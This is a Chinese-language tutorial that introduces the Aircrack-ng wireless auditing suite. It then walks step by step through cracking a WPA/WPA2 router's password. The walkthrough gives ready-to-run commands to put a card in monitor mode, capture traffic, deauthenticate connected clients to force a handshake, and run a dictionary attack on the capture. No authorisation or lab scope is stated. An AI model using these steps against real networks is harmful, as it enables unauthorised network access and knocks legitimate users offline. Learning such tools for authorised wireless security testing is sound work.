0x01 Aircrack-ng介绍

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探WEPWPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站或[1])并嗅探802.11a802.11b802.11g的数据。该程序可运行在LinuxWindows上。

aircrack-ng 包包含有:

Name Description
aircrack-ng 破解WEP以及WPA字典攻击)密钥
airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据
airmon-ng 将网卡设定为监听模式
aireplay-ng 数据包注入工具(Linux和Windows使用CommView驱动程序)
airodump-ng 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
packetforge-ng 创建数据包注入用的加密包。
Tools 混合、转换工具
airbase-ng 软件模拟AP
airdecloak-ng 消除pcap文件中的WEP加密
airdriver-ng 无线设备驱动管理工具
airolib-ng 保存、管理ESSID密码列表,计算对应的密钥
airserv-ng 允许不同的进程访问无线网卡
buddy-ng easside-ng的文件描述
easside-ng 和AP接入点通讯(无WEP)
tkiptun-ng WPA/TKIP攻击
wesside-ng 自动破解WEP密钥

0x02 破解WPA/WPA2加密的无线路由实例

【环境及设备】

windows10、Oracle VM VirtualBox、kali虚拟机、免驱无线网卡一枚【如亮科LK-110】,注意的点是VirtualBox要开启USB2.0支持

【操作步骤】

第一步

airmon-ng check kill #自动检查冲突程序并强制关闭

第二步

airmon-ng start wlan0 #开启monitor模式

该步骤可能会报错,按照termimal提示的指令解决即可

第三步

airodump-ng wlan0mon #获取附近AP信息

第四步

airodump-ng –bssid BSSID -c CH -w 文件位置 wlan0mon

airodump-ng -c 1 –bssid mac地址 -w ~/Desktop/cap/chaos wlan0mon

第五步【新开terminal】

aireplay-ng -0 1 -a mac地址 -c 客户端mac地址 wlan0mon

-0 为攻击次数 -c 可选

该指令可使连接AP的客户端断掉连接,一旦该客户端尝试重新连接,我们便可以抓取到握手数据包。

如果执行第五步后,第四步的terminal右上角显示handshake: AP的MAC(BSSID),说明已经抓取到了握手数据包,可以使用字典进行下一步的破解。

第六步

aircrack-ng -w ~/Desktop/passwd/passwd.txt ~/Desktop/chaos/chaos-01.cap

其中passwd.txt为密码字典文件

参考资料

https://zh.wikipedia.org/wiki/Aircrack-NG

kali linux 无线攻击——aircrack-ng

使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码。

VirtualBox安装扩展增强包、解决USB2.0问题